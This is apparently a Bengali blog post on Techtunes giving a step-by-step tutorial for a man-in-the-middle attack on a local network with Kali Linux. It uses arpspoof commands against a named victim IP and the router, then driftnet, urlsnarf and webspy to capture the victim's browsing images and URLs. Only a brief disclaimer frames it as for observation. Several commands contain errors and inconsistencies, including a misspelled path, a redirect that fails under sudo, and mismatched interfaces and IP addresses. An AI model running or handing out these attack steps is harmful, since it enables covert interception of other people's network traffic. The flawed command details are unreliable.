এই টিউন সুদুমাত্র পয্বেক্ষনের জন্য করা হল, কি উপায়ে "ম্যান ইন মিডেল আট্যক" করা হয়। দয়া করে করো ক্ষতি সাধন করিবেন না। পৌয়গ এবং ব্যবহার নিজ দায়িত্ত বহন করিবে।
"ম্যান ইন মিডেল আট্যক" কিঃ
সহজ কথায় ম্যান ইন মিডেল আট্যক হছ্ছে দুটি বিদ্যমান সংযোগের ভিতর হস্তক্ষেপন।
কায্প্রণালীঃ
আমি এখানে virtual box ও kali linux এর মাধ্যমে কাজটি সম্পন্ন করেছি। Download link: Virtual box and Kali linux কিভাবে virtual box এ kali linux Install করবেন আমাদের টেকটিউনস এর এক ভাই এর দারুন টিউটেরিয়াল লিংক এখন আমরা kali linux এ terminal open করবো (CLT+ALT+T)
এবং ARP spoofing এর জন্য ip add Forwarding এনাবল কিনা যাচাই করবো । In terminal just type cat /proc/sys/net/ipv4/ip_forword যদি return 0 আসে তাহলে বন্ধ আছে।
(ARP spoofing কিঃ ARP স্পুফিং হচ্ছে একটি আক্রমণকারী, একটি নেটওয়ার্কে ডাটা ফ্রেম, যা কিনা পথিমধ্যে ট্রাফিক পরিবর্তন করতে, অথবা সমস্ত ট্রাফিক বন্ধ করার অনুমতি দিতে পারে. প্রায়ই সব আক্রমণ যেমন সেবা অস্বীকার, MAN IN MIDDLE অথবা সেশন হাইজ্যাক আক্রমণের জন্য ব্যবহার করা হয়।)
এখন আমাদের ip forward enable করে নিতে হবে।
Enable ip forward # sudo echo 1 >> /proc/sys/net/ipv4/ip_forward
এখন আমরা আমাদের ভিক্টিম মেসিনের আইপি কেল্কট করব। আপনারা local area network যকনো মেশিন কে আক্রমন করতে পরবেন ।আমি এখানে আমার windows 10 pc কে বেছে নিয়েছি। তাই windows ip বের করব go to start
Start - run- type -cmd - enter. than command is ipconfig.
এথন আমি victim ip কে বাধ্য করব kali linux কে রাউটার হিসেবে দরে নিতে ARP spoofing করে। now in kali terminal sudo arpspoof -i eth0 -t 192.168.0.103 192.168.0.1
তারপর এখন Ruter কে kali linux কে windows pc ধরে নেওয়ার জন্য বাধ্য করব alter the command in new terminal sudo arpspoof -i wlan0 -t 192.168.0.1 192.168.0.101
বাছ হয়ে গেল। এখন আমরা tools driftnet এর মাধৌমে দেখব windows pc তে কি হচ্ছে। in a new terminal
driftnet -i eth0 driftnet আরেকটা window open করবে
এখন windows pc er browser এ কি image দেখা যাচ্ছে তা driftnet window তে দেখতে পারেবন।
আরো অনেক tool আছে যা ব্যবহার করে আমরা তথ্য হাতিয়ে নিতে পারি। webspy, dsniff, urlsnarf
sudo urlsnarf -i eth0
sudo webspy -i eth0 198.162.0.100 (host ip) go dsniff osam learn
নিচে urlsnarf tool use করে information বের করা হল।
ধন্যবাধ।
আমি শরীফ খাঁন। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 8 বছর 10 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 1 টি টিউন ও 2 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
Interested on-- Ethical Hacking Concepts, Real World Information Gathering Scanning and Vulnerability Gathering Network Attacking Techniques Master techniques for password cracking, MITM, Sniffing SSL and RDP attacks. Forensic Analysis and Reverse Engineering .
